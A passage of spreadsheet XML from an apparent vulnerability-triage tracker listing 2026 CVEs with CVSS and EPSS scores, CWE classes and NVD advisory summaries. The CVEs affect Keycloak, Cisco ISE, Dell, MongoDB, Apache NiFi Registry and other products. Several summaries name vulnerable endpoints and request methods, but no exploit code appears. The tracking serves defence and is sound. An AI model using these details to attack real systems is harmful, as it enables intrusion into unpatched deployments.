          <t>keycloak</t>
        </is>
      </c>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr"/>
      <c r="Q709" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>Keycloak is an open-source identity and access management solution. A vulnerability was discovered where a user with the impersonation role can impersonate a realm administrator. This allows the attacker to gain full administrative control over the realm, including the ability to manage users, clients, and roles.</t>
        </is>
      </c>
      <c r="S709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18595</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr"/>
      <c r="Q710" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via AJAX Cron Handler Request Parameter in all versions up to, and including, 3.8.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18595</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27560</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr"/>
      <c r="Q711" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/status/data endpoint by sending a crafted DELETE request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27560</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27561</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr"/>
      <c r="Q712" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/iodd/config endpoint by sending a crafted GET request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27561</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27562</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr"/>
      <c r="Q713" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/iodd/config endpoint by sending a crafted PUT request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27562</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27563</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr"/>
      <c r="Q714" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/datastorage/data endpoint by sending a crafted GET request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27563</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27564</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr"/>
      <c r="Q715" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/datastorage/data endpoint by sending a PUT request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27564</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76424</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr"/>
      <c r="Q716" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE could allow an authenticated, remote attacker to upload or copy arbitrary files on an affected device.
This vulnerability is due to insufficient validation in file operations. An attacker could exploit this vulnerability by uploading a file with a crafted path. A successful exploit could allow the attacker to upload files to arbitrary locations and execute arbitrary commands as root on the affected device.&amp;nbsp;To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76424</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80127</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr"/>
      <c r="Q717" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80127</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81468</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.023</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr"/>
      <c r="Q718" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="S718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81468</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr"/>
      <c r="Q719" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="S719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K720" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr"/>
      <c r="Q720" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="S720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr"/>
      <c r="Q721" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87024</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr"/>
      <c r="Q722" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Asset.</t>
        </is>
      </c>
      <c r="S722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87024</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87976</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr"/>
      <c r="Q723" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi Registry 0.4.0 through 2.11.0 are subject to path manipulation when storing extension bundle content using group, artifact, and version coordinates from uploaded NAR manifests. The default file persistence provider used coordinates as filesystem path components without rejected parent-directory names, and the path-containment check compared an unnormalized resolved path. An authenticated user authorized to write and delete bundles in a bucket can upload a NAR with a crafted manifest resulting in file system operations outside of the file persistence directory. Upgrading to Apache NiFi Registry 2.12.0 is the recommended mitigation, which rejects parent-directory coordinates and requires a normalized path to remain a strict child of the storage root location.</t>
        </is>
      </c>
      <c r="S723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87976</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92469</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr"/>
      <c r="Q724" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an authorization bypass vulnerability in the file-center module DELETE /files/{id} endpoint that performs no ownership validation. Authenticated attackers can enumerate file identifiers via GET /files and delete arbitrary users' files and metadata by supplying their identifiers to the delete endpoint.</t>
        </is>
      </c>
      <c r="S724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92469</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12756</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr"/>
      <c r="Q725" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>IBM Business Automation Workflow containers and traditional is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12756</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13107</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
